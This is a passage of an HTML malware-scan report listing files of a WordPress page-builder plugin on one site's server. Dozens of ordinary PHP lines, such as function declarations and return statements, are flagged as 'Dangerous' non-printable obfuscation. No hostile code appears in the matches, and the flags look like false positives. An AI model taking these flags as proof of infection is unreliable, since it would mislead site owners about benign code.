</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smile_backend_create_folder</span><span style="color: #007700">( &</span><span style="color: #0000BB">$folder</span><span style="color: #007700">, </span><span style="color: #0000BB">$addindex </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 657</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$created</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_315").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_fancy_text.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_316" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_FancyText</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_fancytext'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_fancytext </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_fancytext_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_fancytext_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 440</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_fancytext_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 653</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 654</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 655</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_316").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_ribbons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.11 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_317" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Ribbons</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_ribbon'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_ribbon </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ribbons_module_assets</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ribbon module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ribbons_module_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ribbons_module_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_317").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_dual_colors.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_318" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Dual_colors</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_dual_color'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_dual_color </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_dual_colors_module_assets</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Dual Color</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_colors_module_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 543</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_colors_module_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_318").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_font_manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 24</span><br><table id="file_319" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">; } </span><span style="color: #0000BB">$main </span><span style="color: #007700">= </span><span style="color: #0000BB">$subset_main_array </span><span style="color: #007700">= </span><span style="color: #0000BB">$fonts </span><span style="color: #007700">= array(); </span><span style="color: #0000BB">$subset_call </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; if(!empty(</span><span style="color: #0000BB">$enqueue_fonts</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$font_count </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">; foreach(</span><span style="color: #0000BB">$enqueue_fonts </span><span style="color: #007700">as </span><span style="color: #0000BB">$key </span><span style="color: #007700">=> </span><span style="color: #0000BB">$efont</span><span style="color: #007700">) { </span><span style="color: #0000BB">$font_name </span><span style="color: #007700">= </span><span style="color: #0000BB">$font_call </span><span style="color: #007700">= </span><span style="color: #0000BB">$font_variant </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$font_arr </span><span style="color: #007700">= </span><span style="color: #0000BB">$font_call_arr </span><span style="color: #007700">= </span><span style="color: #0000BB">$font_weight_arr </span><span style="color: #007700">= </span><span style="color: #0000BB">ar</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 174</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_font_manager_dashboard</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 281</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">refresh_google_fonts_list</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is disabled on your server</span><span style="color: #007700">. </span><span style="color: #0000BB">Please contact your hosting service provider to enable it</span><span style="color: #007700">.</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 351</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_google_fonts_list</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_selected_google_font</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_selected_google_font</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 452</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_selected_google_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_variants_callback</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_font_manager_menu</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'enquque_ultimate_google_fonts'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 562</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enquque_ultimate_google_fonts</span><span style="color: #007700">(</span><span style="color: #0000BB">$enqueue_fonts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 570</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 665</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">(</span><span style="color: #0000BB">$font_attributes</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$font_family</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">];</span>
</span>
